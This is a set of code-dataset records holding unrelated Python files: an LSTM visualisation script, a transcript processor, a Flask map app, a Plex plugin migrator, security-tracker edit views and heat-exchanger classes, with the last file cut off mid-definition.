spio.loadmat(datadir+'D_TRAIN.mat')\nY_train = spio.loadmat(datadir+'L_TRAIN.mat')\nX_test = spio.loadmat(datadir+'D_TEST.mat')\nY_test = spio.loadmat(datadir+'L_TEST.mat')\n\nx_train = X_train['D_TRAIN'][:, 0:sl]\ny_train = Y_train['L_TRAIN'][:, 0]\nx_test = X_test['D_TEST'][:, 0:sl]\ny_test = Y_test['L_TEST'][:, 0]\n\n# reshape input to be [samples, time steps, features]\ntrainX = numpy.reshape(x_train, (x_train.shape[0], x_train.shape[1], 1))\ntestX = numpy.reshape(x_test, (x_test.shape[0], x_test.shape[1], 1))\n\nprint(\"Input is loaded, scaled and reshaped ...\")\n\n# Loading the trained model and printing the summary of the model\nprint(\"Loading the model ...\")\nmodel = load_model(datadir+'/beforeNormal_t17/my_model_plus_14.h5')\nprint(model.summary())\n\n# Layer 1 Params\nW0_I = K.get_value(model.layers[0].W_i)\nW0_O = K.get_value(model.layers[0].W_o)\nW0_F = K.get_value(model.layers[0].W_f)\nW0_C = K.get_value(model.layers[0].W_c)\n\nU0_I = K.get_value(model.layers[0].U_i)\nU0_O = K.get_value(model.layers[0].U_o)\nU0_F = K.get_value(model.layers[0].U_f)\nU0_C = K.get_value(model.layers[0].U_c)\n\nB0_I = K.get_value(model.layers[0].b_i)\nB0_O = K.get_value(model.layers[0].b_o)\nB0_F = K.get_value(model.layers[0].b_f)\nB0_C = K.get_value(model.layers[0].b_c)\n\n# Layer 2 Params\nW1_I = K.get_value(model.layers[1].W_i)\nW1_O = K.get_value(model.layers[1].W_o)\nW1_F = K.get_value(model.layers[1].W_f)\nW1_C = K.get_value(model.layers[1].W_c)\n\nU1_I = K.get_value(model.layers[1].U_i)\nU1_O = K.get_value(model.layers[1].U_o)\nU1_F = K.get_value(model.layers[1].U_f)\nU1_C = K.get_value(model.layers[1].U_c)\n\nB1_I = K.get_value(model.layers[1].b_i)\nB1_O = K.get_value(model.layers[1].b_o)\nB1_F = K.get_value(model.layers[1].b_f)\nB1_C = K.get_value(model.layers[1].b_c)\n\nmodel_tmp = Sequential()\nmodel_tmp.add(LSTM(output_dim=sl, return_sequences=True, dropout_W=model.layers[0].dropout_W,\n dropout_U=model.layers[0].dropout_U, input_shape=(sl, 1), weights=model.layers[0].get_weights()))\nactivations_l1 = model_tmp.predict(testX)\nmodel_tmp.add(LSTM(sl, dropout_W=model.layers[1].dropout_W, stateful=False, dropout_U=model.layers[1].dropout_U,\n return_sequences=False, weights=model.layers[1].get_weights()))\nactivations_l2 = model_tmp.predict(testX)\n\nlayer_0 = {'lstm_output_1': activations_l1, 'W0_I': W0_I, 'W0_O': W0_O, 'W0_F': W0_F, 'W0_C': W0_C, 'U0_I': U0_I,\n 'U0_O': U0_O, 'U0_F': U0_F, 'U0_C': U0_C, 'B0_I': B0_I, 'B0_O': B0_O, 'B0_F': B0_F, 'B0_C': B0_C}\nlayer_1 = {'lstm_output_2': activations_l2, 'W1_I': W1_I, 'W1_O': W1_O, 'W1_F': W1_F, 'W1_C': W1_C, 'U1_I': U1_I,\n 'U1_O': U1_O, 'U1_F': U1_F, 'U1_C': U1_C, 'B1_I': B1_I, 'B1_O': B1_O, 'B1_F': B1_F, 'B1_C': B1_C}\n\ndatadir = direc + '/' + dataset + '/'\nspio.savemat(datadir+'/beforeNormal_t17/NetworkVis.mat', {'layer_0': layer_0, 'layer_1': layer_1})\n\n# initialStates = model.layers[0].get_initial_states(testX)\n#model_tmp.layers[0].step = step\n#TheanoLayer = K.rnn(step_function=step, inputs=testX[0:32,:], initial_states=model_tmp.layers[0].states)\n# model_tmp = Sequential()\n# model_tmp.add(LSTM(output_dim=sl, return_sequences=True, dropout_W=model.layers[0].dropout_W,\n# dropout_U=model.layers[0].dropout_U, input_shape=(sl, 1), weights=model.layers[0].get_weights(),\n# stateful=True, batch_input_shape=(32, sl, 1)))\n# activations_l1 = model_tmp.predict(testX[0:32,:])\n# xx = step(testX[0:32,:],model_tmp.layers[0].states)\n#intermediate_tens = K.function([model.layers[0].input],[model.layers[1].states])\n#intermed = intermediate_tens([testX])[0]\n\n\n# def step(self, x, states):\n# h_tm1 = states[0]\n# c_tm1 = states[1]\n# B_U = states[2]\n# B_W = states[3]\n#\n# if self.consume_less == 'gpu':\n# z = K.dot(x * B_W[0], self.W) + K.dot(h_tm1 * B_U[0], self.U) + self.b\n#\n# z0 = z[:, :self.output_dim]\n# z1 = z[:, self.output_dim: 2 * self.output_dim]\n# z2 = z[:, 2 * self.output_dim: 3 * self.output_dim]\n# z3 = z[:, 3 * self.output_dim:]\n#\n# i = self.inner_activation(z0)\n# f = self.inner_activation(z1)\n# c = f * c_tm1 + i * self.activation(z2)\n# o = self.inner_activation(z3)\n# else:\n# if self.consume_less == 'cpu':\n# x_i = x[:, :self.output_dim]\n# x_f = x[:, self.output_dim: 2 * self.output_dim]\n# x_c = x[:, 2 * self.output_dim: 3 * self.output_dim]\n# x_o = x[:, 3 * self.output_dim:]\n# elif self.consume_less == 'mem':\n# x_i = K.dot(x * B_W[0], self.W_i) + self.b_i\n# x_f = K.dot(x * B_W[1], self.W_f) + self.b_f\n# x_c = K.dot(x * B_W[2], self.W_c) + self.b_c\n# x_o = K.dot(x * B_W[3], self.W_o) + self.b_o\n# else:\n# raise ValueError('Unknown `consume_less` mode.')\n#\n# i = self.inner_activation(x_i + K.dot(h_tm1 * B_U[0], self.U_i))\n# f = self.inner_activation(x_f + K.dot(h_tm1 * B_U[1], self.U_f))\n# c = f * c_tm1 + i * self.activation(x_c + K.dot(h_tm1 * B_U[2], self.U_c))\n# o = self.inner_activation(x_o + K.dot(h_tm1 * B_U[3], self.U_o))\n#\n# h = o * self.activation(c)\n# return h, [h, c]\n\n\n# def get_activations(model, layer, X_batch):\n# get_activations = theano.function([model.layers[0].input],model.layers[layer].get_output(train=False),allow_input_downcast=True)\n# activations = get_activations(X_batch)\n# return activations\n\n# def step(self, x, states):\n#\n# # get prev hidden layer from input that is concatenation of\n# # prev hidden layer + reset gate + update gate\n# x = x[:self.output_dim, :]\n#\n# ###############################################\n# # This is the original code from the GRU layer\n#\n# h_tm1 = states[0] # previous memory\n# B_U = states[1] # dropout matrices for recurrent units\n# B_W = states[2]\n#\n# if self.consume_less == 'gpu':\n#\n# matrix_x = K.dot(x * B_W[0], self.W) + self.b\n# matrix_inner = K.dot(h_tm1 * B_U[0], self.U[:, :2 * self.output_dim])\n#\n# x_z = matrix_x[:, :self.output_dim]\n# x_r = matrix_x[:, self.output_dim: 2 * self.output_dim]\n# inner_z = matrix_inner[:, :self.output_dim]\n# inner_r = matrix_inner[:, self.output_dim: 2 * self.output_dim]\n#\n# z = self.inner_activation(x_z + inner_z)\n# r = self.inner_activation(x_r + inner_r)\n#\n# x_h = matrix_x[:, 2 * self.output_dim:]\n# inner_h = K.dot(r * h_tm1 * B_U[0], self.U[:, 2 * self.output_dim:])\n# hh = self.activation(x_h + inner_h)\n# else:\n# if self.consume_less == 'cpu':\n# x_z = x[:, :self.output_dim]\n# x_r = x[:, self.output_dim: 2 * self.output_dim]\n# x_h = x[:, 2 * self.output_dim:]\n# elif self.consume_less == 'mem':\n# x_z = K.dot(x * B_W[0], self.W_z) + self.b_z\n# x_r = K.dot(x * B_W[1], self.W_r) + self.b_r\n# x_h = K.dot(x * B_W[2], self.W_h) + self.b_h\n# else:\n# raise Exception('Unknown `consume_less` mode.')\n# z = self.inner_activation(x_z + K.dot(h_tm1 * B_U[0], self.U_z))\n# r = self.inner_activation(x_r + K.dot(h_tm1 * B_U[1], self.U_r))\n#\n# hh = self.activation(x_h + K.dot(r * h_tm1 * B_U[2], self.U_h))\n# h = z * h_tm1 + (1 - z) * hh\n#\n# # End of original code\n# ###########################################################\n#\n# # concatenate states you want to monitor, in this case the\n# # hidden layer activations and gates z and r\n# all = K.concatenate([h, z, r])\n#\n# # return everything\n# return all, [h]\n","sub_path":"modelVisualization.py","file_name":"modelVisualization.py","file_ext":"py","file_size_in_byte":8280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"75989390","text":"import sys, glob, os\nimport helper_mongo as h\nfrom docx import Document\nfrom subprocess import call\nfrom data_spec import create_dictionary_of_file_list\nfrom get_text_units import getTextUnits\n\nimport pprint\nimport constants\nimport re\nimport pdb\n\nTRACKER = constants.USHMM_TRACKER_COLLECTION\nOUTPUT = constants.OUTPUT_COLLECTION_USHMM\nDB = constants.DB\nINPUT_FOLDER=constants.INPUT_FOLDER_USHMM_TRANSCRIPTS_PDF_TRANSFORMED_TO_DOCS\nOUTPUT_FOLDER_USHMM_PROCESSING_LOGS=constants.OUTPUT_FOLDER_USHMM_PROCESSING_LOGS \n\n\n\n\n\ndef createStructuredTranscriptDoc(debug):\n \"\"\"\n Processes the 509 doc files beloging to the core asset in data\n Core asset is identified by numbers RG-50.030, RG-50.106, RG-50.549\n \"\"\"\n \n\n core_doc_asset = []\n missing_files=[]\n\n # get all the docx files that are part of the core asset\n for file in glob.glob(INPUT_FOLDER+\"*.*\"):\n # RG numbers for the core asset\n \n \n\n if not (\"RG-50.030\" in file or\n #this is questionable\n \"RG-50.106\" in file or\n \"RG-50.549\" in file):\n\n \n \n # append to the array\n core_doc_asset.append(file)\n\n \n core_doc_asset=create_dictionary_of_file_list(core_doc_asset)\n # get the units for each file, store them and update tracker\n not_processed=0\n processed_doc=0\n \n for c, mongo_rg in enumerate(core_doc_asset):\n #set the debugger\n if (debug == True) and (c==3):\n break\n # get text units for this entry\n processed=[]\n result=[]\n \n for file in core_doc_asset[mongo_rg]:\n\n \n units = getTextUnits(file)\n \n if units:\n #replace white spaces\n for i,element in enumerate(units):\n units[i]['unit']=' '.join(element['unit'].split())\n result.extend(units)\n \n processed.append(True)\n else:\n #check if processed\n processed.append(False)\n #set the method used to transform the transcript\n h.update_field(DB, TRACKER, \"rg_number\", mongo_rg, \"method\", \"transcribe_non_core_docx_made_from_pdf\")\n\n not_processed=not_processed+1\n if False in processed:\n h.update_field(DB, TRACKER, \"rg_number\", mongo_rg, \"status\", \"Unprocessed\")\n missing_files.append(' '.join(core_doc_asset[mongo_rg]))\n\n not_processed=not_processed+1\n else:\n # insert units on the output collection\n h.update_field(DB, OUTPUT, \"shelfmark\", 'USHMM '+mongo_rg, \"structured_transcript\", result)\n\n \n # update status on the stracker\n \n h.update_field(DB, TRACKER, \"rg_number\", mongo_rg, \"status\", \"Processed\")\n processed_doc=processed_doc+1\n\n \n #write the missing files to text file\n file = open(OUTPUT_FOLDER_USHMM_PROCESSING_LOGS+'transcribe_non_core_docx_made_from_pdf_failed.txt','w')\n file.write('\\n'.join(missing_files))\n # success\n pprint.pprint(\"Core_doc_asset was successfully processed.\")\n\nif __name__ == \"__main__\":\n createStructuredTranscriptDoc()\n\n \n\n #getTextUnits()\n \"\"\"\n result = h.query(DB, OUTPUT, { \"structured_transcript\": {'$exists': 'true'}}, {'id': 0})\n pprint.pprint(result)\n \"\"\"\n","sub_path":"scripts/transform_ushmm_transcripts/transcribe_non_core_docx_made_from_pdf.py","file_name":"transcribe_non_core_docx_made_from_pdf.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"310165189","text":"\"\"\"Exercício Python 057: Faça um programa que leia o sexo de uma\npessoa, mas só aceite os valores 'M' ou 'F'. Caso esteja errado,\npeça a digitação novamente até ter um valor correto.\"\"\"\n\nprint('\\n\\033[1;34mVALIDAÇÃO DE DADOS')\nsexo = str(input('Digite seu sexo [M/F]: ').strip()).upper()\n\nwhile sexo != 'M' and sexo != 'F':\n\n sexo = str(input('\\n\\033[1;31mINVÁLIDO!\\nDigite seu sexo [M/F]: \\033[m').strip()).upper()\n\nif sexo == 'M':\n\n print('\\n\\033[1;34mVocê é do sexo Masculino !')\nelif sexo == 'F':\n\n print('\\n\\033[1;34mVocê é do sexo Feminino !')\n","sub_path":"ExerciceList/ex057.py","file_name":"ex057.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"485141448","text":"from flask import Blueprint, make_response, render_template, abort\n\nfrom c3bottles import app\nfrom c3bottles.lib.statistics import stats_obj\nfrom c3bottles.model.category import categories_sorted\nfrom c3bottles.model.drop_point import DropPoint\n\n\nbp = Blueprint(\"view\", __name__)\n\n\n@bp.route(\"/list\")\ndef list_():\n return render_template(\n \"view/list.html\",\n total_drop_points=stats_obj.overall_drop_point_count,\n categories=categories_sorted(),\n )\n\n\n@bp.route(\"/list.js\")\ndef list_js():\n resp = make_response(render_template(\n \"js/list.js\",\n all_dps_json=DropPoint.get_dps_json()\n ))\n resp.mimetype = \"application/javascript\"\n return resp\n\n\n@bp.route(\"/map\")\ndef map_():\n if not app.config.get(\"MAP_SOURCE\"):\n abort(404)\n return render_template(\n \"view/map.html\",\n total_drop_points=stats_obj.overall_drop_point_count,\n categories=categories_sorted(),\n )\n\n\n@bp.route(\"/map.js\")\ndef map_js():\n resp = make_response(render_template(\n \"js/map.js\",\n all_dps_json=DropPoint.get_dps_json()\n ))\n resp.mimetype = \"application/javascript\"\n return resp\n\n\n@bp.route(\"/details\") # This seems useless but we need this for dynamic URL building\n@bp.route(\"/details/\")\ndef details(number=None):\n dp = DropPoint.query.get_or_404(number)\n return render_template(\"view/details.html\", dp=dp)\n\n\n@bp.route(\"/details.js/\")\ndef details_js(number):\n resp = make_response(render_template(\n \"js/details.js\",\n all_dps_json=DropPoint.get_dps_json(),\n dp=DropPoint.query.get_or_404(number),\n ))\n resp.mimetype = \"application/javascript\"\n return resp\n","sub_path":"c3bottles/views/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"56941577","text":"import json\nfrom typing import Dict\nfrom jsonschema import validate\nfrom jsonschema.exceptions import ValidationError\nimport pandas as pd\n\n\n# [START validate event/input]\ndef validate_event(event: object, schema_path: str) -> None:\n with open(schema_path) as schema_file:\n schema = json.load(schema_file)\n try:\n validate(event, schema)\n except ValidationError as e:\n raise ValidationError(\n f'Check event against schema: {e}')\n# [END validate event/input]\n\n\n# [START get_kwargs]\ndef get_kwargs(event: Dict) -> Dict:\n \"Assumes event has a body, or else ignores\"\n if not isinstance(event, dict):\n raise TypeError('event must be a dictionary')\n if 'body' not in event or isinstance(event['body'], str):\n kwargs = event\n elif isinstance(event['body'], dict):\n kwargs = event['body']\n return kwargs\n# [END get_kwargs]\n\n\n# [START sanitize output]\ndef sanitize_output(result) -> None:\n for key, value in result.items():\n if isinstance(value, pd.Series):\n result[key] = value.reset_index().to_json()\n if isinstance(value, pd.DataFrame):\n result[key] = value.to_json()\n# [END sanitize output]\n","sub_path":"ops_helpers/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"551203825","text":"from core.helpers import all\nfrom core.logger import Logger\nfrom plugin.core.constants import PLUGIN_VERSION_BASE\n\nfrom lxml import etree\nimport shutil\nimport os\n\nlog = Logger('core.migrator')\n\n\nclass Migrator(object):\n migrations = []\n\n @classmethod\n def register(cls, migration):\n cls.migrations.append(migration())\n\n @classmethod\n def run(cls):\n for migration in cls.migrations:\n log.debug('Running migration %s', migration)\n migration.run()\n\n\nclass Migration(object):\n @property\n def code_path(self):\n return Core.code_path\n\n @property\n def lib_path(self):\n return os.path.join(self.code_path, '..', 'Libraries')\n\n @property\n def plex_path(self):\n return os.path.abspath(os.path.join(self.code_path, '..', '..', '..', '..'))\n\n @property\n def preferences_path(self):\n return os.path.join(self.plex_path, 'Plug-in Support', 'Preferences', 'com.plexapp.plugins.trakttv.xml')\n\n def get_preferences(self):\n if not os.path.exists(self.preferences_path):\n log.error('Unable to find preferences file at \"%s\", unable to run migration', self.preferences_path)\n return {}\n\n data = Core.storage.load(self.preferences_path)\n doc = etree.fromstring(data)\n\n return dict([(elem.tag, elem.text) for elem in doc])\n\n def set_preferences(self, changes):\n if not os.path.exists(self.preferences_path):\n log.error('Unable to find preferences file at \"%s\", unable to run migration', self.preferences_path)\n return False\n\n data = Core.storage.load(self.preferences_path)\n doc = etree.fromstring(data)\n\n for key, value in changes.items():\n elem = doc.find(key)\n\n # Ensure node exists\n if elem is None:\n elem = etree.SubElement(doc, key)\n\n # Update node value, ensure it is a string\n elem.text = str(value)\n\n log.trace('Updated preference with key \"%s\" to value %s', key, repr(value))\n\n # Write back new preferences\n Core.storage.save(self.preferences_path, etree.tostring(doc, pretty_print=True))\n\n @staticmethod\n def delete_file(path, conditions=None):\n if not all([c(path) for c in conditions]):\n return False\n\n os.remove(path)\n return True\n\n @staticmethod\n def delete_directory(path, conditions=None):\n if not all([c(path) for c in conditions]):\n return False\n\n shutil.rmtree(path)\n return True\n\n\nclass Clean(Migration):\n tasks_code = [\n (\n 'delete_file', [\n # /core\n 'core/environment.py',\n 'core/eventing.py',\n 'core/model.py',\n 'core/network.py',\n 'core/trakt.py',\n 'core/trakt_objects.py',\n\n # /data\n 'data/client.py',\n 'data/dict_object.py',\n 'data/model.py',\n 'data/user.py',\n\n # /pts\n 'pts/activity.py',\n 'pts/activity_logging.py',\n 'pts/activity_websocket.py',\n\n # /sync\n 'sync/base.py',\n 'sync/legacy.py',\n 'sync/manager.py',\n 'sync/task.py',\n\n # /\n 'sync.py'\n ], os.path.isfile\n ),\n (\n 'delete_directory', [\n 'plex'\n ], os.path.isdir\n )\n ]\n\n tasks_lib = [\n (\n 'delete_file', [\n # asio\n 'Shared/asio.py',\n 'Shared/asio_base.py',\n 'Shared/asio_posix.py',\n 'Shared/asio_windows.py',\n 'Shared/asio_windows_interop.py',\n\n # plex\n 'Shared/plex/core/compat.py',\n 'Shared/plex/core/event.py',\n 'Shared/plex/interfaces/library.py',\n\n # plex.metadata.py\n 'Shared/plex_metadata/core/cache.py',\n\n # requests\n 'Shared/requests/packages/urllib3/util.py',\n\n # trakt.py\n 'Shared/trakt/core/context.py',\n 'Shared/trakt/interfaces/base/media.py',\n 'Shared/trakt/interfaces/account.py',\n 'Shared/trakt/interfaces/rate.py',\n 'Shared/trakt/interfaces/sync/base.py',\n 'Shared/trakt/media_mapper.py',\n 'Shared/trakt/request.py'\n ], os.path.isfile\n ),\n (\n 'delete_directory', [\n # trakt.py\n 'Shared/trakt/interfaces/movie',\n 'Shared/trakt/interfaces/show',\n 'Shared/trakt/interfaces/user'\n ], os.path.isdir\n )\n ]\n\n def run(self):\n if PLUGIN_VERSION_BASE >= (0, 8):\n self.upgrade()\n\n def upgrade(self):\n self.execute(self.tasks_code, 'upgrade', self.code_path)\n self.execute(self.tasks_lib, 'upgrade', self.lib_path)\n\n def execute(self, tasks, name, base_path):\n for action, paths, conditions in tasks:\n if type(paths) is not list:\n paths = [paths]\n\n if type(conditions) is not list:\n conditions = [conditions]\n\n if not hasattr(self, action):\n log.error('Unknown migration action \"%s\"', action)\n continue\n\n m = getattr(self, action)\n\n for path in paths:\n path = os.path.join(base_path, path)\n path = os.path.abspath(path)\n\n # Remove file\n if m(path, conditions):\n log.info('(%s) %s: \"%s\"', name, action, path)\n\n # Remove .pyc files as-well\n if path.endswith('.py') and m(path + 'c', conditions):\n log.info('(%s) %s: \"%s\"', name, action, path + 'c')\n\n\nclass ForceLegacy(Migration):\n \"\"\"Migrates the 'force_legacy' option to the 'activity_mode' option.\"\"\"\n\n def run(self):\n self.upgrade()\n\n def upgrade(self):\n if not os.path.exists(self.preferences_path):\n log.error('Unable to find preferences file at \"%s\", unable to run migration', self.preferences_path)\n return\n\n preferences = self.get_preferences()\n\n # Read 'force_legacy' option from raw preferences\n force_legacy = preferences.get('force_legacy')\n\n if force_legacy is None:\n return\n\n force_legacy = force_legacy.lower() == \"true\"\n\n if not force_legacy:\n return\n\n # Read 'activity_mode' option from raw preferences\n activity_mode = preferences.get('activity_mode')\n\n # Activity mode has already been set, not changing it\n if activity_mode is not None:\n return\n\n self.set_preferences({\n 'activity_mode': '1'\n })\n\n\nclass SelectiveSync(Migration):\n \"\"\"Migrates the syncing task bool options to selective synchronize/push/pull enums\"\"\"\n\n option_keys = [\n 'sync_watched',\n 'sync_ratings',\n 'sync_collection'\n ]\n\n value_map = {\n 'false': '0',\n 'true': '1',\n }\n\n def run(self):\n self.upgrade()\n\n def upgrade(self):\n preferences = self.get_preferences()\n\n # Filter to only relative preferences\n preferences = dict([\n (key, value)\n for key, value in preferences.items()\n if key in self.option_keys\n ])\n\n changes = {}\n\n for key, value in preferences.items():\n if value not in self.value_map:\n continue\n\n changes[key] = self.value_map[value]\n\n if not changes:\n return\n\n log.debug('Updating preferences with changes: %s', changes)\n self.set_preferences(changes)\n\n\nMigrator.register(Clean)\nMigrator.register(ForceLegacy)\nMigrator.register(SelectiveSync)\nMigrator.run()\n","sub_path":"Trakttv.bundle/Contents/Code/core/migrator.py","file_name":"migrator.py","file_ext":"py","file_size_in_byte":8036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222943649","text":"from flask import render_template, flash, redirect\nfrom app import app, db\nfrom app.form import CVEForm, GroupForm\nfrom app.model import CVE, CVEGroup, CVEGroupEntry, CVEGroupPackage\nfrom app.model.enum import Remote, Severity, Affected, status_to_affected, affected_to_status, highest_severity\nfrom app.model.cve import cve_id_regex\nfrom app.model.cvegroup import vulnerability_group_regex\nfrom app.view.error import not_found\nfrom app.util import multiline_to_list\nfrom sqlalchemy import func\nfrom itertools import chain\nfrom collections import defaultdict\n\n\n@app.route('//edit'.format(cve_id_regex[1:-1]), methods=['GET', 'POST'])\ndef edit_cve(cve):\n cve = db.get(CVE, id=cve)\n if cve is None:\n return not_found()\n form = CVEForm()\n if not form.is_submitted():\n form.cve.data = cve.id\n form.issue_type.data = cve.issue_type\n form.description.data = cve.description\n form.severity.data = cve.severity.name\n form.remote.data = cve.remote.name\n form.notes.data = cve.notes\n if not form.validate_on_submit():\n return render_template('form/cve.html',\n title='Edit {}'.format(cve),\n form=form,\n CVE=CVE)\n\n severity = Severity.fromstring(form.severity.data)\n severity_changed = cve.severity != severity\n\n cve.issue_type = form.issue_type.data\n cve.description = form.description.data\n cve.severity = severity\n cve.remote = Remote.fromstring(form.remote.data)\n cve.notes = form.notes.data\n\n if severity_changed or True:\n # update cached group severity for all goups containing this issue\n groups = (db.session.query(CVEGroupEntry, CVEGroup)\n .filter_by(cve=cve).join(CVEGroup)).all()\n issues = (db.session.query(CVEGroup, CVE)\n .filter(CVEGroup.id.in_([group.id for (entry, group) in groups]))\n .join(CVEGroupEntry).join(CVE)\n .group_by(CVEGroup.id).group_by(CVE.id)).all()\n group_severity = defaultdict(list)\n for group, cve in issues:\n group_severity[group].append(cve.severity)\n for group, severities in group_severity.items():\n group.severity = highest_severity(severities)\n\n db.session.commit()\n flash('Edited {}'.format(cve.id))\n return redirect('/{}'.format(cve.id))\n\n\n@app.route('//edit'.format(vulnerability_group_regex[1:-1]), methods=['GET', 'POST'])\ndef edit_group(avg):\n group_id = avg.replace('AVG-', '')\n group_data = (db.session.query(CVEGroup, CVE, func.group_concat(CVEGroupPackage.pkgname, ' '))\n .filter(CVEGroup.id == group_id)\n .join(CVEGroupEntry).join(CVE).join(CVEGroupPackage)\n .group_by(CVEGroup.id).group_by(CVE.id)\n .order_by(CVE.id)).all()\n if not group_data:\n return not_found()\n group = group_data[0][0]\n issues = [cve for (group, cve, pkg) in group_data]\n issue_ids = [cve.id for cve in issues]\n pkgnames = set(chain.from_iterable([pkg.split(' ') for (group, cve, pkg) in group_data]))\n\n form = GroupForm()\n if not form.is_submitted():\n form.affected.data = group.affected\n form.fixed.data = group.fixed\n form.pkgnames.data = \"\\n\".join(sorted(pkgnames))\n form.status.data = status_to_affected(group.status).name\n form.notes.data = group.notes\n form.bug_ticket.data = group.bug_ticket\n form.advisory_qualified.data = 'true' if group.advisory_qualified else 'false'\n\n form.cve.data = \"\\n\".join(issue_ids)\n if not form.validate_on_submit():\n return render_template('form/group.html',\n title='Edit {}'.format(avg),\n form=form,\n CVEGroup=CVEGroup)\n\n pkgnames_edited = multiline_to_list(form.pkgnames.data)\n group.affected = form.affected.data\n group.fixed = form.fixed.data\n group.status = affected_to_status(Affected.fromstring(form.status.data), pkgnames_edited[0], group.fixed)\n group.bug_ticket = form.bug_ticket.data\n group.notes = form.notes.data\n group.advisory_qualified = 'true' == form.advisory_qualified.data\n\n cve_ids = [form.cve.data] if '\\r\\n' not in form.cve.data else form.cve.data.split('\\r\\n')\n cve_ids = set(filter(lambda s: s.startswith('CVE-'), cve_ids))\n issues_removed = set(filter(lambda issue: issue not in cve_ids, issue_ids))\n issues_added = set(filter(lambda issue: issue not in issue_ids, cve_ids))\n\n if issues_removed:\n (db.session.query(CVEGroupEntry)\n .filter(CVEGroupEntry.group_id == group.id).filter(CVEGroupEntry.cve_id.in_(issues_removed))\n .delete(synchronize_session=False))\n for removed in issues_removed:\n flash('Removed {}'.format(removed))\n\n severities = [issue.severity for issue in list(filter(lambda issue: issue.id not in issues_removed, issues))]\n for cve_id in issues_added:\n cve = db.get_or_create(CVE, id=cve_id)\n db.get_or_create(CVEGroupEntry, group=group, cve=cve)\n severities.append(cve.severity)\n flash('Added {}'.format(cve.id))\n group.severity = highest_severity(severities)\n\n pkgnames_removed = set(filter(lambda pkgname: pkgname not in pkgnames_edited, pkgnames))\n pkgnames_added = set(filter(lambda pkgname: pkgname not in pkgnames, pkgnames_edited))\n\n if pkgnames_removed:\n (db.session.query(CVEGroupPackage)\n .filter(CVEGroupPackage.group_id == group.id).filter(CVEGroupPackage.pkgname.in_(pkgnames_removed))\n .delete(synchronize_session=False))\n for removed in pkgnames_removed:\n flash('Removed {}'.format(removed))\n\n for pkgname in pkgnames_added:\n db.get_or_create(CVEGroupPackage, pkgname=pkgname, group=group)\n flash('Added {}'.format(pkgname))\n\n db.session.commit()\n flash('Edited {}'.format(group.name))\n return redirect('/{}'.format(group.name))\n","sub_path":"app/view/edit.py","file_name":"edit.py","file_ext":"py","file_size_in_byte":6048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"598012441","text":"# -*- coding: utf-8 -*-\nimport sys\nimport numpy as np\nclass flux() :\n '''\n FLUX OBJECT HELP:\n =================\n \n This object gather all the attributes of a flux.\n \n ex : \n fh1 = flux(id=1, \n exchanger=\"ech1\", \n type=\"eau\", \n timeserieIn=[170.2, 170.3, 170.3, 169.5,170.2], \n timeserieOut=[59.9, 59.3, 60.2, 60.0, 60.0], \n capteur=[\"capt1\",\"capt2\"], \n chaudfroid=\"chaud\",\n debit=1,\n Cp=3)\n \n :returns: A flux objects with all the parameters related \n :rtype: object\n '''\n def __init__(self, **kwargs):\n self.id = kwargs['id']\n self.name = kwargs['name']\n self.exchanger = kwargs['exchanger']\n self.flow = kwargs['flow']\n self.type = kwargs['type']\n self.timeserieIn = kwargs['timeserieIn']\n self.timeserieOut = kwargs['timeserieOut']\n self.pressure = kwargs['pressure']\n self.d = kwargs['d']\n self.sensor = kwargs['sensor']\n self.hotCold = kwargs['hotCold']\n self.Cp = kwargs['Cp'] # ici on a Cp = cp * debit\n # create a method which computes the average of the data collected by the sensor\n def mean(self) :\n '''\n MEAN HELP:\n ==========\n \n This function computes the mean of the timeseries of in and out flux.\n It returns a tuple of float : (mean_in, mean_out)\n '''\n return (np.mean(self.timeserieIn), np.mean(self.timeserieOut))\n def std(self) :\n '''\n STD HELP:\n This function computes the standard deviation of the timeseries of in and out flux.\n It returns a tuple of float : (std_in, std_out)\n '''\n return (np.std(self.timeserieIn), np.std(self.timeserieOut))\n \n def num_step(self) :\n '''\n This function computes the number of steps of a given TS\n '''\n num1 = len(self.timeserieOut)\n num2 = len(self.timeserieIn)\n if num1 != num2 :\n print(\"WARNING: The number of steps in IN and OUT temperatures are different.\")\n print(\"WARNING: this might create troubles when computing the cascade en enthalpies.\")\n else :\n return num1\n \n def Q(self) :\n '''\n Q HELP:\n =======\n This functions lets you compute the quantity of energy corresponding to a given flux\n \n :returns: list of Q values\n :rtype: list\n '''\n numStep = self.num_step()\n Q = []\n for step in range(numStep) :\n deltaT = self.timeserieIn[step] - self.timeserieOut[step]\n Q.append(deltaT * self.Cp)\n return Q\n def dt(self) :\n '''\n dt HELP:\n =======\n This functions lets you compute the delta T between the IN and OUT temp of a given flux\n \n :returns: list of Temp values\n :rtype: list\n '''\n TList = []\n numStep = self.num_step()\n for step in range(numStep) :\n DT = self.timeserieIn[step] - self.timeserieOut[step]\n TList.append(DT)\n return TList\n \n \n \nclass exchanger() :\n '''\n EXCHANGER OBJECT HELP:\n ======================\n \n This object gather all the attributes of an exchanger.\n \n ex : \n fh1 = exchanger(id=1,\n name=\"bc001\",\n type='eau/fumée',\n sensor='sensor001',\n position=[1,2]\n )\n :returns: An exchanger object with all the parameters related.\n :rtype: object\n '''\n def __init__(self, **kwargs):\n self.id = kwargs['id']\n self.name = kwargs['name']\n self.type = kwargs['type']\n self.sensor = kwargs['sensor']\n self.position = kwargs['position']\n self.flux = kwargs['flux']\n \nclass hen():\n '''\n HEAT EXCHANGER NETWORK HELP:\n ============================\n \n This object stores all the informations relative to a given heat exchanger network.\n \n '''\n def __init__(self, **kwargs):\n self.id = kwargs['id']\n self.totalSavedEnergy = kwargs['totalSavedEnergy']\n # list of ids corresponding the the flux id \n self.config = kwargs['config']\n self.totalRecycledEnergy = kwargs['totalRecycledEnergy']\n self.totalRecycledEnergyFromStorage = kwargs['totalRecycledEnergyFromStorage']\n \n \n def 